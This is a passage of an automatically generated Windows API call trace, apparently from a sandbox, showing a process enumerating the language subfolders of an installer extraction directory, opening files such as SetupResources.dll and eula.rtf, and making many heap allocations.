[0061.373] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0061.373] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.373] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.373] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.373] CloseHandle (hObject=0x41c) returned 1 [0061.373] AreFileApisANSI () returned 1 [0061.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 46 [0061.374] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.374] GetFileType (hFile=0x41c) returned 0x1 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.374] CloseHandle (hObject=0x41c) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.374] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.374] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.375] AreFileApisANSI () returned 1 [0061.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0061.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1045\\SetupResources.dll") returned 46 [0061.375] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1045\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.375] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.375] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.375] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x467c0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䝘")) returned 0 [0061.375] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0061.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0061.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0061.375] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.375] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0061.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0061.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.376] AreFileApisANSI () returned 1 [0061.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1046", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1046", lpUsedDefaultChar=0x0) returned 27 [0061.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0061.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.376] AreFileApisANSI () returned 1 [0061.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046") returned 27 [0061.376] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046" (normalized: "c:\\588bce7c90097ed212\\1046"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.377] GetLastError () returned 0x5 [0061.377] GetLastError () returned 0x5 [0061.377] SetLastError (dwErrCode=0x5) [0061.377] GetLastError () returned 0x5 [0061.377] SetLastError (dwErrCode=0x5) [0061.377] GetLastError () returned 0x5 [0061.377] SetLastError (dwErrCode=0x5) [0061.377] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.377] AreFileApisANSI () returned 1 [0061.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.377] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88630, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046") returned 27 [0061.377] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046" (normalized: "c:\\588bce7c90097ed212\\1046"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.378] GetLastError () returned 0x5 [0061.378] GetLastError () returned 0x5 [0061.378] SetLastError (dwErrCode=0x5) [0061.378] GetLastError () returned 0x5 [0061.378] SetLastError (dwErrCode=0x5) [0061.378] GetLastError () returned 0x5 [0061.378] SetLastError (dwErrCode=0x5) [0061.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.378] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0061.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.378] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1049", cAlternateFileName="")) returned 1 [0061.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.378] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0061.379] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.379] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0061.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0061.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0061.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0061.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.380] AreFileApisANSI () returned 1 [0061.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1046\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.380] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0061.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.380] AreFileApisANSI () returned 1 [0061.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 36 [0061.381] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.381] GetFileType (hFile=0x41c) returned 0x1 [0061.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.381] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.381] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.381] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.381] CloseHandle (hObject=0x41c) returned 1 [0061.382] AreFileApisANSI () returned 1 [0061.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1046\\eula.rtf") returned 36 [0061.382] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1046\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1046\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.382] GetFileType (hFile=0x41c) returned 0x1 [0061.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.382] CloseHandle (hObject=0x41c) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 